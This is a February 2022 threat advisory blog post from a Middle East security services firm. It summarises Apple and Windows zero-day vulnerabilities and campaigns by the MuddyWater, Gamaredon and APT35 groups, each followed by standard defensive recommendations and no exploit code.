Threat advisories

Top Middle East Cyber Threats – 7 February 2022

Feb-2022 5 min to read

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

Apple addresses two zero-day vulnerabilities

Apple issued security updates to address two zero-day vulnerabilities, one of which was publicly disclosed while the other was exploited in the wild by attackers to gain access to iPhones and Mac devices.

The first zero-day vulnerability (tracked as CVE-2022-22587 ^[1, 2]) is a memory corruption bug in the IOMobileFrameBuffer that affects iOS, iPadOS, and macOS Monterey. Exploiting this bug successfully results in arbitrary code execution with kernel privileges on compromised devices. Apple confirmed in its advisory that this vulnerability may have been exploited in the wild.

The second zero-day tracked as CVE-2022-22594 ^[1, 2] is a Safari WebKit bug in iOS and iPadOS that allows websites to track browsing activity and users’ identities in real-time. Furthermore, iOS 15.3 contains ten updates, including a WebKit patch that may result in arbitrary code execution, according to Apple’s security website.

RECOMMENDATIONS

Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
Review the official notification ^[¹^,²^] from Apple and deploy necessary updates as soon as possible.

Exploits disclosed in public for Windows vulnerability – CVE-2022-21882

An exploit for a Windows local privilege elevation vulnerability was publicly disclosed recently by a security researcher. It allows anyone to gain administrative privileges in Windows 10. By exploiting this vulnerability, threat actors with limited access to a compromised host can easily elevate their permissions to spread laterally within the network, create new administrative users, or execute privileged commands.

As part of the January 2022 Patch Tuesday, Microsoft fixed a Win32k elevation of privilege vulnerability tracked as CVE-2022-21882, which is a bypass for the previously patched and actively exploited CVE-2021-1732 bug.

The flaw affects all supported versions of Windows 10 prior to the January 2022 Patch Tuesday updates.

RECOMMENDATIONS

Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
Review the January 2022 “Release Notes” and “Deployment Information” for more details and apply the necessary patches as soon as possible.

Iranian APT MuddyWater utilizes malicious documents

Cisco Talos has observed a new campaign attributed to MuddyWater — an APT group recently linked to Iran’s Ministry of Intelligence and Security (MOIS).

The threat actor conducted various campaigns against entities spread throughout the USA, Europe, Middle East and South Asia.

A typical TTP employed by the group is the heavy use of scripting in infection chains, utilizing languages like PowerShell and Visual Basic coupled with the frequent use of living-off-the-land binaries (LoLBins).

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow macros for unknown MS Office files.
Enable software restriction policies and application whitelisting.
Ensure that email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and shared indicators of compromise (IoCs).
Block the indicators of compromise (IoCs) within respective security controls organization wide.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

Russian hackers use eight new malware payloads in attacks

The Russia-linked hackers known as ‘Gamaredon’ (aka Armageddon or Shuckworm) were spotted deploying eight custom binaries in recent cyber-espionage operations.

The threat actor used spear-phishing emails that carried macro-laced Word documents as an initial access vector. These files launched a VBS file that dropped “Pteranodon,” a well-documented backdoor that Gamaredon has been developing and improving for almost seven years now.

However, while recent attacks are still conducted using phishing emails, these attacks now drop eight different payloads.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow macros for unknown MS Office files.
Enable software restriction policies and application whitelisting.
Ensure that email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and shared indicators of compromise (IoCs).
Block the indicators of compromise (IoCs) within respective security controls organization wide.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

Iranian state-sponsored group APT35 linked to Memento ransomware

Security researchers have found links between APT35 (aka Phosphorus, Charming Kitten), one of Iran’s most active cyber-espionage groups, and Memento, a ransomware strain that was deployed in attacks in the fall of 2021.

These groups, mostly operating as contractors for the Iranian government, scan the web for popular types of servers and use exploits for recently disclosed vulnerabilities to gain control over unpatched systems. If the compromised networks belong to an entity of interest to the Iranian government, the groups deploy malware that can be used to harvest information from the hacked systems and maintain persistent access for future intelligence collection.

Recent research found that APT35 developed a new malware named Powerless, written in PowerShell, and deployed on hacked Microsoft Exchange servers last year. Cybereason said APT35 used this malware for its intelligence collection targets.

While investigating this new threat, researchers found several clues that linked APT35’s infrastructure to past attacks of the Memento ransomware gang.

This included shared IP addresses, similar file naming schemes, and similar URL directory patterns — findings that led researchers to believe that APT35 operators were likely behind the Memento ransomware as well.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow macros for unknown MS Office files.
Enable software restriction policies and application whitelisting.
Ensure that email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and shared indicators of compromise (IoCs).
Block the indicators of compromise (IoCs) within respective security controls organization wide.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

References: